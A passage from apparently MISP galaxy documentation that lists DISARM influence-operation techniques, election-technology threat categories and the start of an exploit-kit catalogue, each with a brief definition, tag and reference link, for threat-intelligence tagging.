URL deletion occurs when an influence operation completely removes its website registration, rendering the URL inaccessible. An influence operation may delete its URLs to complicate attribution or remove online documentation that the operation ever occurred.

The tag is: misp-galaxy:disarm-techniques="Delete URLs"

Table 1486. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.004.md

Coordinate on Encrypted/Closed Networks

Coordinate on encrypted/ closed networks

The tag is: misp-galaxy:disarm-techniques="Coordinate on Encrypted/Closed Networks"

Table 1487. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.005.md

Deny Involvement

Without "smoking gun" proof (and even with proof), incident creator can or will deny involvement. This technique also leverages the attacker advantages outlined in "Demand insurmountable proof", specifically the asymmetric disadvantage for truth-tellers in a "firehose of misinformation" environment.

The tag is: misp-galaxy:disarm-techniques="Deny Involvement"

Table 1488. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.006.md

Delete Accounts/Account Activity

Deleting accounts and account activity occurs when an influence operation removes its online social media assets, including social media accounts, posts, likes, comments, and other online artefacts. An influence operation may delete its accounts and account activity to complicate attribution or remove online documentation that the operation ever occurred.

The tag is: misp-galaxy:disarm-techniques="Delete Accounts/Account Activity"

Table 1489. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.007.md

Redirect URLs

An influence operation may redirect its falsified or typosquatted URLs to legitimate websites to increase the operation’s appearance of legitimacy, complicate attribution, and avoid detection.

The tag is: misp-galaxy:disarm-techniques="Redirect URLs"

Table 1490. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.008.md

Remove Post Origins

Removing post origins refers to the elimination of evidence that indicates the initial source of operation content, often to complicate attribution. An influence operation may remove post origins by deleting watermarks, renaming files, or removing embedded links in its content.

The tag is: misp-galaxy:disarm-techniques="Remove Post Origins"

Table 1491. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.009.md

Misattribute Activity

Misattributed activity refers to incorrectly attributed operation activity. For example, a state sponsored influence operation may conduct operation activity in a way that mimics another state so that external entities misattribute activity to the incorrect state. An operation may misattribute their activities to complicate attribution, avoid detection, or frame an adversary for negative behaviour.

The tag is: misp-galaxy:disarm-techniques="Misattribute Activity"

Table 1492. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.010.md

Conceal Infrastructure

Conceal the campaign’s infrastructure to avoid takedown and attribution.

The tag is: misp-galaxy:disarm-techniques="Conceal Infrastructure"

Table 1493. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.md

Conceal Sponsorship

Concealing sponsorship aims to mislead or obscure the identity of the hidden sponsor behind an operation rather than entity publicly running the operation. Operations that conceal sponsorship may maintain visible falsified groups, news outlets, non-profits, or other organisations, but seek to mislead or obscure the identity sponsoring, funding, or otherwise supporting these entities. Influence operations may use a variety of techniques to mask the location of their social media accounts to complicate attribution and conceal evidence of foreign interference. Operation accounts may set their location to a false place, often the location of the operation’s target audience, and post in the region’s language

The tag is: misp-galaxy:disarm-techniques="Conceal Sponsorship"

Table 1494. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.001.md

Utilise Bulletproof Hosting

Hosting refers to services through which storage and computing resources are provided to an individual or organisation for the accommodation and maintenance of one or more websites and related services. Services may include web hosting, file sharing, and email distribution. Bulletproof hosting refers to services provided by an entity, such as a domain hosting or web hosting firm, that allows its customer considerable leniency in use of the service. An influence operation may utilise bulletproof hosting to maintain continuity of service for suspicious, illegal, or disruptive operation activities that stricter hosting services would limit, report, or suspend.

The tag is: misp-galaxy:disarm-techniques="Utilise Bulletproof Hosting"

Table 1495. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.002.md

Use Shell Organisations

Use Shell Organisations to conceal sponsorship.

The tag is: misp-galaxy:disarm-techniques="Use Shell Organisations"

Table 1496. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.003.md

Use Cryptocurrency

Use Cryptocurrency to conceal sponsorship. Examples include Bitcoin, Monero, and Etherium.

The tag is: misp-galaxy:disarm-techniques="Use Cryptocurrency"

Table 1497. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.004.md

Obfuscate Payment

Obfuscate Payment

The tag is: misp-galaxy:disarm-techniques="Obfuscate Payment"

Table 1498. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.005.md

Exploit TOS/Content Moderation

Exploiting weaknesses in platforms' terms of service and content moderation policies to avoid takedowns and platform actions.

The tag is: misp-galaxy:disarm-techniques="Exploit TOS/Content Moderation"

Table 1499. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0131.md

Legacy Web Content

Make incident content visible for a long time, e.g. by exploiting platform terms of service, or placing it where it’s hard to remove or unlikely to be removed.

The tag is: misp-galaxy:disarm-techniques="Legacy Web Content"

Table 1500. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0131.001.md

Post Borderline Content

Post Borderline Content

The tag is: misp-galaxy:disarm-techniques="Post Borderline Content"

Table 1501. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0131.002.md

Measure Performance

A metric used to determine the accomplishment of actions. “Are the actions being executed as planned?”

The tag is: misp-galaxy:disarm-techniques="Measure Performance"

Table 1502. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0132.md

People Focused

Measure the performance individuals in achieving campaign goals

The tag is: misp-galaxy:disarm-techniques="People Focused"

Table 1503. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0132.001.md

Content Focused

Measure the performance of campaign content

The tag is: misp-galaxy:disarm-techniques="Content Focused"

Table 1504. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0132.002.md

View Focused

View Focused

The tag is: misp-galaxy:disarm-techniques="View Focused"

Table 1505. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0132.003.md

Measure Effectiveness

A metric used to measure a current system state. “Are we on track to achieve the intended new system state within the planned timescale?”

The tag is: misp-galaxy:disarm-techniques="Measure Effectiveness"

Table 1506. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.md

Behaviour Changes

Monitor and evaluate behaviour changes from misinformation incidents.

The tag is: misp-galaxy:disarm-techniques="Behaviour Changes"

Table 1507. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.001.md

Content

Measure current system state with respect to the effectiveness of campaign content.

The tag is: misp-galaxy:disarm-techniques="Content"

Table 1508. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.002.md

Awareness

Measure current system state with respect to the effectiveness of influencing awareness.

The tag is: misp-galaxy:disarm-techniques="Awareness"

Table 1509. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.003.md

Knowledge

Measure current system state with respect to the effectiveness of influencing knowledge.

The tag is: misp-galaxy:disarm-techniques="Knowledge"

Table 1510. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.004.md

Action/Attitude

Measure current system state with respect to the effectiveness of influencing action/attitude.

The tag is: misp-galaxy:disarm-techniques="Action/Attitude"

Table 1511. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.005.md

Measure Effectiveness Indicators (or KPIs)

Ensuring that Key Performance Indicators are identified and tracked, so that the performance and effectiveness of campaigns, and elements of campaigns, can be measured, during and after their execution.

The tag is: misp-galaxy:disarm-techniques="Measure Effectiveness Indicators (or KPIs)"

Table 1512. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0134.md

Message Reach

Monitor and evaluate message reach in misinformation incidents.

The tag is: misp-galaxy:disarm-techniques="Message Reach"

Table 1513. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0134.001.md

Social Media Engagement

Monitor and evaluate social media engagement in misinformation incidents.

The tag is: misp-galaxy:disarm-techniques="Social Media Engagement"

Table 1514. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0134.002.md

Undermine

Weaken, debilitate, or subvert a target or their actions. An influence operation may be designed to disparage an opponent; sabotage an opponent’s systems or processes; compromise an opponent’s relationships or support system; impair an opponent’s capability; or thwart an opponent’s initiative.

The tag is: misp-galaxy:disarm-techniques="Undermine"

Table 1515. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.md

Smear

Denigrate, disparage, or discredit an opponent. This is a common tactical objective in political campaigns with a larger strategic goal. It differs from efforts to harm a target through defamation. If there is no ulterior motive and the sole aim is to cause harm to the target, then choose sub-technique “Defame” of technique “Cause Harm” instead.

The tag is: misp-galaxy:disarm-techniques="Smear"

Table 1516. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.001.md

Thwart

Prevent the successful outcome of a policy, operation, or initiative. Actors conduct influence operations to stymie or foil proposals, plans, or courses of action which are not in their interest.

The tag is: misp-galaxy:disarm-techniques="Thwart"

Table 1517. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.002.md

Subvert

Sabotage, destroy, or damage a system, process, or relationship. The classic example is the Soviet strategy of “active measures” involving deniable covert activities such as political influence, the use of front organisations, the orchestration of domestic unrest, and the spread of disinformation.

The tag is: misp-galaxy:disarm-techniques="Subvert"

Table 1518. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.003.md

Polarise

To cause a target audience to divide into two completely opposing groups. This is a special case of subversion. To divide and conquer is an age-old approach to subverting and overcoming an enemy.

The tag is: misp-galaxy:disarm-techniques="Polarise"

Table 1519. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.004.md

Cultivate Support

Grow or maintain the base of support for the actor, ally, or action. This includes hard core recruitment, managing alliances, and generating or maintaining sympathy among a wider audience, including reputation management and public relations. Sub-techniques assume support for actor (self) unless otherwise specified.

The tag is: misp-galaxy:disarm-techniques="Cultivate Support"

Table 1520. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.md

Defend Reputaton

Preserve a positive perception in the public’s mind following an accusation or adverse event. When accused of a wrongful act, an actor may engage in denial, counter accusations, whataboutism, or conspiracy theories to distract public attention and attempt to maintain a positive image.

The tag is: misp-galaxy:disarm-techniques="Defend Reputaton"

Table 1521. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.001.md

Justify Action

To convince others to exonerate you of a perceived wrongdoing. When an actor finds it untenable to deny doing something, they may attempt to exonerate themselves with disinformation which claims the action was reasonable. This is a special case of “Defend Reputation”.

The tag is: misp-galaxy:disarm-techniques="Justify Action"

Table 1522. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.002.md

Energise Supporters

Raise the morale of those who support the organisation or group. Invigorate constituents with zeal for the mission or activity. Terrorist groups, political movements, and cults may indoctrinate their supporters with ideologies that are based on warped versions of religion or cause harm to others.

The tag is: misp-galaxy:disarm-techniques="Energise Supporters"

Table 1523. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.003.md

Boost Reputation

Elevate the estimation of the actor in the public’s mind. Improve their image or standing. Public relations professionals use persuasive overt communications to achieve this goal; manipulators use covert disinformation.

The tag is: misp-galaxy:disarm-techniques="Boost Reputation"

Table 1524. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.004.md

Cultvate Support for Initiative

Elevate or fortify the public backing for a policy, operation, or idea. Domestic and foreign actors can use artificial means to fabricate or amplify public support for a proposal or action.

The tag is: misp-galaxy:disarm-techniques="Cultvate Support for Initiative"

Table 1525. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.005.md

Cultivate Support for Ally

Elevate or fortify the public backing for a partner. Governments may interfere in other countries’ elections by covertly favouring a party or candidate aligned with their interests. They may also mount an influence operation to bolster the reputation of an ally under attack.

The tag is: misp-galaxy:disarm-techniques="Cultivate Support for Ally"

Table 1526. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.006.md

Recruit Members

Motivate followers to join or subscribe as members of the team. Organisations may mount recruitment drives that use propaganda to entice sympathisers to sign up.

The tag is: misp-galaxy:disarm-techniques="Recruit Members"

Table 1527. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.007.md

Increase Prestige

Improve personal standing within a community. Gain fame, approbation, or notoriety. Conspiracy theorists, those with special access, and ideologues can gain prominence in a community by propagating disinformation, leaking confidential documents, or spreading hate.

The tag is: misp-galaxy:disarm-techniques="Increase Prestige"

Table 1528. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.008.md

Make Money

Profit from disinformation, conspiracy theories, or online harm. In some cases, the sole objective is financial gain, in other cases the objective is both financial and political. Making money may also be a way to sustain a political campaign.

The tag is: misp-galaxy:disarm-techniques="Make Money"

Table 1529. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.md

Generate Ad Revenue

Earn income from digital advertisements published alongside inauthentic content. Conspiratorial, false, or provocative content drives internet traffic. Content owners earn money from impressions of, or clicks on, or conversions of ads published on their websites, social media profiles, or streaming services, or ads published when their content appears in search engine results. Fraudsters simulate impressions, clicks, and conversions, or they spin up inauthentic sites or social media profiles just to generate ad revenue. Conspiracy theorists and political operators generate ad revenue as a byproduct of their operation or as a means of sustaining their campaign.

The tag is: misp-galaxy:disarm-techniques="Generate Ad Revenue"

Table 1530. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.001.md

Scam

Defraud a target or trick a target into doing something that benefits the attacker. A typical scam is where a fraudster convinces a target to pay for something without the intention of ever delivering anything in return. Alternatively, the fraudster may promise benefits which never materialise, such as a fake cure. Criminals often exploit a fear or crisis or generate a sense of urgency. They may use deepfakes to impersonate authority figures or individuals in distress.

The tag is: misp-galaxy:disarm-techniques="Scam"

Table 1531. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.002.md

Raise Funds

Solicit donations for a cause. Popular conspiracy theorists can attract financial contributions from their followers. Fighting back against the establishment is a popular crowdfunding narrative.

The tag is: misp-galaxy:disarm-techniques="Raise Funds"

Table 1532. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.003.md

Sell Items under False Pretences

Offer products for sale under false pretences. Campaigns may hijack or create causes built on disinformation to sell promotional merchandise. Or charlatans may amplify victims’ unfounded fears to sell them items of questionable utility such as supplements or survival gear.

The tag is: misp-galaxy:disarm-techniques="Sell Items under False Pretences"

Table 1533. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.004.md

Extort

Coerce money or favours from a target by threatening to expose or corrupt information. Ransomware criminals typically demand money. Intelligence agencies demand national secrets. Sexual predators demand favours. The leverage may be critical, sensitive, or embarrassing information.

The tag is: misp-galaxy:disarm-techniques="Extort"

Table 1534. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.005.md

Manipulate Stocks

Artificially inflate or deflate the price of stocks or other financial instruments and then trade on these to make profit. The most common securities fraud schemes are called “pump and dump” and “poop and scoop”.

The tag is: misp-galaxy:disarm-techniques="Manipulate Stocks"

Table 1535. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.006.md

Motivate to Act

Persuade, impel, or provoke the target to behave in a specific manner favourable to the attacker. Some common behaviours are joining, subscribing, voting, buying, demonstrating, fighting, retreating, resigning, boycotting.

The tag is: misp-galaxy:disarm-techniques="Motivate to Act"

Table 1536. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0138.md

Encourage

Inspire, animate, or exhort a target to act. An actor can use propaganda, disinformation, or conspiracy theories to stimulate a target to act in its interest.

The tag is: misp-galaxy:disarm-techniques="Encourage"

Table 1537. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0138.001.md

Provoke

Instigate, incite, or arouse a target to act. Social media manipulators exploit moral outrage to propel targets to spread hate, take to the streets to protest, or engage in acts of violence.

The tag is: misp-galaxy:disarm-techniques="Provoke"

Table 1538. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0138.002.md

Compel

Force target to take an action or to stop taking an action it has already started. Actors can use the threat of reputational damage alongside military or economic threats to compel a target.

The tag is: misp-galaxy:disarm-techniques="Compel"

Table 1539. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0138.003.md

Dissuade from Acting

Discourage, deter, or inhibit the target from actions which would be unfavourable to the attacker. The actor may want the target to refrain from voting, buying, fighting, or supplying.

The tag is: misp-galaxy:disarm-techniques="Dissuade from Acting"

Table 1540. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0139.md

Discourage

To make a target disinclined or reluctant to act. Manipulators use disinformation to cause targets to question the utility, legality, or morality of taking an action.

The tag is: misp-galaxy:disarm-techniques="Discourage"

Table 1541. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0139.001.md

Silence

Intimidate or incentivise target into remaining silent or prevent target from speaking out. A threat actor may cow a target into silence as a special case of deterrence. Or they may buy the target’s silence. Or they may repress or restrict the target’s speech.

The tag is: misp-galaxy:disarm-techniques="Silence"

Table 1542. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0139.002.md

Deter

Prevent target from taking an action for fear of the consequences. Deterrence occurs in the mind of the target, who fears they will be worse off if they take an action than if they don’t. When making threats, aggressors may bluff, feign irrationality, or engage in brinksmanship.

The tag is: misp-galaxy:disarm-techniques="Deter"

Table 1543. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0139.003.md

Cause Harm

Persecute, malign, or inflict pain upon a target. The objective of a campaign may be to cause fear or emotional distress in a target. In some cases, harm is instrumental to achieving a primary objective, as in coercion, repression, or intimidation. In other cases, harm may be inflicted for the satisfaction of the perpetrator, as in revenge or sadistic cruelty.

The tag is: misp-galaxy:disarm-techniques="Cause Harm"

Table 1544. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0140.md

Defame

Attempt to damage the target’s personal reputation by impugning their character. This can range from subtle attempts to misrepresent or insinuate, to obvious attempts to denigrate or disparage, to blatant attempts to malign or vilify. Slander applies to oral expression. Libel applies to written or pictorial material. Defamation is often carried out by online trolls. The sole aim here is to cause harm to the target. If the threat actor uses defamation as a means of undermining the target, then choose sub-technique “Smear” of technique “Undermine” instead.

The tag is: misp-galaxy:disarm-techniques="Defame"

Table 1545. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0140.001.md

Intimidate

Coerce, bully, or frighten the target. An influence operation may use intimidation to compel the target to act against their will. Or the goal may be to frighten or even terrify the target into silence or submission. In some cases, the goal is simply to make the victim suffer.

The tag is: misp-galaxy:disarm-techniques="Intimidate"

Table 1546. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0140.002.md

Spread Hate

Publish and/or propagate demeaning, derisive, or humiliating content targeting an individual or group of individuals with the intent to cause emotional, psychological, or physical distress. Hate speech can cause harm directly or incite others to harm the target. It often aims to stigmatise the target by singling out immutable characteristics such as colour, race, religion, national or ethnic origin, gender, gender identity, sexual orientation, age, disease, or mental or physical disability. Thus, promoting hatred online may involve racism, antisemitism, Islamophobia, xenophobia, sexism, misogyny, homophobia, transphobia, ageism, ableism, or any combination thereof. Motivations for hate speech range from group preservation to ideological superiority to the unbridled infliction of suffering.

The tag is: misp-galaxy:disarm-techniques="Spread Hate"

Table 1547. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0140.003.md

Acquire Compromised Asset

Threat Actors may take over existing assets not owned by them through nefarious means, such as using technical exploits, hacking, purchasing compromised accounts from the dark web, or social engineering.

The tag is: misp-galaxy:disarm-techniques="Acquire Compromised Asset"

Table 1548. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0141.md

Acquire Compromised Account

Threat Actors can take over existing users’ accounts to distribute campaign content. 

The actor may maintain the asset’s previous identity to capitalise on the perceived legitimacy its previous owner had cultivated.

The actor may completely rebrand the account to exploit its existing reach, or relying on the account’s history to avoid more stringent automated content moderation rules applied to new accounts.

See also [Mitre ATT&CK’s T1586 Compromise Accounts](https://attack.mitre.org/techniques/T1586/) for more technical information on how threat actors may achieve this objective.

This Technique was previously called Compromise Legitimate Accounts, and used the ID T0011.

The tag is: misp-galaxy:disarm-techniques="Acquire Compromised Account"

Table 1549. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0141.001.md

Acquire Compromised Website

Threat Actors may take over existing websites to publish or amplify inauthentic narratives. This includes the defacement of websites, and cases where websites’ personas are maintained to add credence to threat actors’ narratives.

See also [Mitre ATT&CK’s T1584 Compromise Infrastructure](https://attack.mitre.org/techniques/T1584/) for more technical information on how threat actors may achieve this objective.

The tag is: misp-galaxy:disarm-techniques="Acquire Compromised Website"

Table 1550. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0141.002.md

Fabricate Grassroots Movement

This technique, sometimes known as "astroturfing", occurs when an influence operation disguises itself as a grassroots movement or organisation that supports operation narratives. 

Astroturfing aims to increase the appearance of popular support for an evolving grassroots movement in contrast to "Utilise Butterfly Attacks", which aims to discredit an existing grassroots movement. 

This Technique was previously called Astroturfing, and used the ID T0099.001

The tag is: misp-galaxy:disarm-techniques="Fabricate Grassroots Movement"

Table 1551. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0142.md

Election guidelines

Universal Development and Security Guidelines as Applicable to Election Technology..

Election guidelines is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

NIS Cooperation Group

Tampering with registrations

Tampering with registrations

The tag is: misp-galaxy:guidelines="Tampering with registrations"

Table 1552. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

DoS or overload of party/campaign registration, causing them to miss the deadline

DoS or overload of party/campaign registration, causing them to miss the deadline

The tag is: misp-galaxy:guidelines="DoS or overload of party/campaign registration, causing them to miss the deadline"

Table 1553. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Fabricated signatures from sponsor

Fabricated signatures from sponsor

The tag is: misp-galaxy:guidelines="Fabricated signatures from sponsor"

Table 1554. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Identity fraud during voter registration

Identity fraud during voter registration

The tag is: misp-galaxy:guidelines="Identity fraud during voter registration"

Table 1555. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Deleting or tampering with voter data

Deleting or tampering with voter data

The tag is: misp-galaxy:guidelines="Deleting or tampering with voter data"

Table 1556. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

DoS or overload of voter registration system, suppressing voters

DoS or overload of voter registration system, suppressing voters

The tag is: misp-galaxy:guidelines="DoS or overload of voter registration system, suppressing voters"

Table 1557. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking candidate laptops or email accounts

Hacking candidate laptops or email accounts

The tag is: misp-galaxy:guidelines="Hacking candidate laptops or email accounts"

Table 1558. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking campaign websites (defacement, DoS)

Hacking campaign websites (defacement, DoS)

The tag is: misp-galaxy:guidelines="Hacking campaign websites (defacement, DoS)"

Table 1559. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Misconfiguration of a website

Misconfiguration of a website

The tag is: misp-galaxy:guidelines="Misconfiguration of a website"

Table 1560. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Leak of confidential information

Leak of confidential information

The tag is: misp-galaxy:guidelines="Leak of confidential information"

Table 1561. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking/misconfiguration of government servers, communication networks, or endpoints

Hacking/misconfiguration of government servers, communication networks, or endpoints

The tag is: misp-galaxy:guidelines="Hacking/misconfiguration of government servers, communication networks, or endpoints"

Table 1562. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking campaign websites, spreading misinformation on the election process, registered parties/candidates, or results

Hacking government websites, spreading misinformation on the election process, registered parties/candidates, or results

The tag is: misp-galaxy:guidelines="Hacking campaign websites, spreading misinformation on the election process, registered parties/candidates, or results"

Table 1563. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

DoS or overload of government websites

DoS or overload of government websites

The tag is: misp-galaxy:guidelines="DoS or overload of government websites"

Table 1564. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering or DoS of voting and/or vote confidentiality during or after the elections

Tampering or DoS of voting and/or vote confidentiality during or after the elections

The tag is: misp-galaxy:guidelines="Tampering or DoS of voting and/or vote confidentiality during or after the elections"

Table 1565. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Software bug altering results

Software bug altering results

The tag is: misp-galaxy:guidelines="Software bug altering results"

Table 1566. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering with logs/journals

Tampering with logs/journals

The tag is: misp-galaxy:guidelines="Tampering with logs/journals"

Table 1567. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Breach of voters privacy during the casting of votes

Breach of voters privacy during the casting of votes

The tag is: misp-galaxy:guidelines="Breach of voters privacy during the casting of votes"

Table 1568. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering, DoS or overload of the systems used for counting or aggregating results

Tampering, DoS or overload of the systems used for counting or aggregating results

The tag is: misp-galaxy:guidelines="Tampering, DoS or overload of the systems used for counting or aggregating results"

Table 1569. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering or DoS of communication links uesd to transfer (interim) results

The tag is: misp-galaxy:guidelines="Tampering or DoS of communication links uesd to transfer (interim) results"

Table 1570. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering with supply chain involved in the movement or transfer data

Tampering with supply chain involved in the movement or transfer data

The tag is: misp-galaxy:guidelines="Tampering with supply chain involved in the movement or transfer data"

Table 1571. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking of internal systems used by media or press

Hacking of internal systems used by media or press

The tag is: misp-galaxy:guidelines="Hacking of internal systems used by media or press"

Table 1572. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering, DoS, or overload of media communication links

The tag is: misp-galaxy:guidelines="Tampering, DoS, or overload of media communication links"

Table 1573. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Defacement, DoS or overload of websites or other systems used for publication of the results

Defacement, DoS or overload of websites or other systems used for publication of the results

The tag is: misp-galaxy:guidelines="Defacement, DoS or overload of websites or other systems used for publication of the results"

Table 1574. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Exploit-Kit

Exploit-Kit is an enumeration of some exploitation kits used by adversaries. The list includes document, browser and router exploit kits.It’s not meant to be totally exhaustive but aim at covering the most seen in the past 5 years.

Exploit-Kit is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Kafeine - Will Metcalf - KahuSecurity

Astrum

Astrum Exploit Kit is a private Exploit Kit used in massive scale malvertising campaigns. It’s notable by its use of Steganography

The tag is: misp-galaxy:exploit-kit="Astrum"

Astrum is also known as:

  • Stegano EK

Table 1575. Table References

Links

http://malware.dontneedcoffee.com/2014/09/astrum-ek.html

http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/

Underminer

